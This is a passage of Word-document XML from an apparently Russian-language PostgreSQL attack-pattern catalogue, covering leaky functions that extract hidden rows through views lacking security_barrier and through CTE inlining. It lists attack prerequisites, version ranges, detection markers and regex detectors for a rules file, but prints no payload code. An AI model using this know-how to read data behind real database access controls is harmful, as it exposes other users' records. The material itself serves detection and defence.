          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t>. Только SUPERUSER может создать. Требование введено в PG 9.2; до этого leaky-функции были unrestricted, что делало ACL-views полностью бесполезными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A9E9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTE inlining</w:t>
      </w:r>
      <w:r>
        <w:t>: с PG 12, документация https://www.postgresql.org/docs/12/queries-with.html#QUERIES-WITH-CTE-MATERIALIZATION. Поведение: CTE c одиночной ссылкой → inline; со множественными → materialize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31140FA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicit `MATERIALIZED` / `NOT MATERIALIZED`</w:t>
      </w:r>
      <w:r>
        <w:t>: PG 12+ keyword, override-механизм для планировщика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A87378" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62B694" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 12+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для CTE inlining default и для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keywords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0352DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.2+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EAEF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA3867" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Payload A/B: SELECT на view + CREATE FUNCTION на своей user-schema (или public до PG 15).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2B3FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Payload C: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для создания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функции; без SUPERUSER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> view надёжно блокирует push-down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFD265" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View с `security_barrier=off`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт) — необходимое условие для Payload A/B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E272C3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: работает идентично self-hosted. CTE/view-фичи стабильны и одинаковы на всех провайдерах. На managed-PG атрибут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устанавливается DBA через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER VIEW</w:t>
      </w:r>
      <w:r>
        <w:t>; провайдеры его не контролируют.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8AE7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA3D0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Materialization control в reports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH counts AS MATERIALIZED (SELECT ...) SELECT * FROM counts CROSS JOIN big_table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — материализация дешёвой stage перед join с большой таблицей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF45D61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTE для аналитики над view</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH summary AS (SELECT customer_id, sum(total) FROM orders_visible GROUP BY customer_id) SELECT * FROM summary WHERE customer_id IN (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обычный pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AF4DA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LEAKPROOF-функции в production</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: некоторые core PG функции помечены как LEAKPROOF — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int4eq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>texteq</w:t>
      </w:r>
      <w:r>
        <w:t>, и т.д. Они безопасны, потому что не имеют side-effects и не raise exceptions с user-data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18429314" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Маркеры атаки vs легитимного использования:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D111B77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`leak`/`leaky` в имени функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — очевидный сигнал в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.proname</w:t>
      </w:r>
      <w:r>
        <w:t>. Однако реальные атакующие назовут функцию нейтрально (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pred1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>validate_str</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24577CB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`COST 0.0001`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.procost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция с экстремально низкой cost-меткой. Legitimate функции редко переопределяют дефолт; cost=0.0001 — индикатор атаки на pushdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B588C8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`prosecdef=true` + `LEAKPROOF=true` + owner != superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — invariant violation. С PG 9.2+ только superuser может создать LEAKPROOF-функцию; если функция с этим флагом owned не superuser-ом — что-то нарушено (post-exploitation evidence).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1460FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`RAISE NOTICE`/`RAISE EXCEPTION`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с user-data внутри predicate-функции — leak-канал. Сигнатура в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE\s+(NOTICE|EXCEPTION)\s+'[^']*%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> рядом с column-references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD91E4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`WITH ... AS NOT MATERIALIZED`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в runtime-генерируемом SQL — почти всегда атака. Легитимное использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> редко в application-коде (там CTE-обёртки просто без keyword); явное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — explicit performance-hint, обычно в reporting/ETL ad-hoc-запросах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C54C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC2F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 12 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главный таргет 3.10.3 (CTE inlining дефолт, leaky-views unchanged).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB45517" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.2 – 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CTE всегда materialized → дефолтная защита от Payload B; но прямой Payload A без CTE — работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67315428" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично. Provider-специфики нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7665A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26EA25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главный канал извлечения данных через leaky-функцию. Функция RAISE EXCEPTION с leaked-данными — error-based oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF180E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2 (plperlu untrusted) / 3.7.3 (plpython3u)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернативная среда для создания leaky-функции с side-effects (HTTP-callback вместо RAISE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB1A9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.2 (pg_proc разведка)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.proleakproof</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чтобы найти существующие LEAKPROOF-функции — кандидаты для злоупотребления без CREATE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03684304" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 (Data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CTE с DML внутри + leaky функция вне — write через push-down side-effect. CTE-инжекция комбо: смесь write и read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFA55A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.2 (Recursive CTE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — recursive amplify для leak-функции: каждая итерация — отдельный вызов leak() на чужой строке, экспоненциальная компрессия атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD750AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пререквизит для Payload C (создание LEAKPROOF-функции требует SUPERUSER).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3ED4A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.x (RLS bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — соседний класс, в чём-то пересекается. RLS — отдельный механизм с собственными bypass-CVE (R9, R11). Граница: 3.10.3 — про view ACL (WHERE-в-view), 3.17 — про RLS policies на таблицах. Атакующий часто комбинирует: leak через view → RLS-protected таблица → SET ROLE bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71531A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bWITH\b.*?\bNOT\s+MATERIALIZED\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (явный NOT MATERIALIZED — explicit anti-protection), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b.*?\bLEAKPROOF\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (создание LEAKPROOF-функции — pre-attack setup), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bCOST\s+0\.\d{4,}\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (экстремально низкая cost — pushdown-bait) — ни одного из этих детекторов нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.10 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.10.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358DE204" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F247791" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Rules and Privileges — Updatable Views, security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550BAD6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: CREATE FUNCTION — LEAKPROOF, COST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
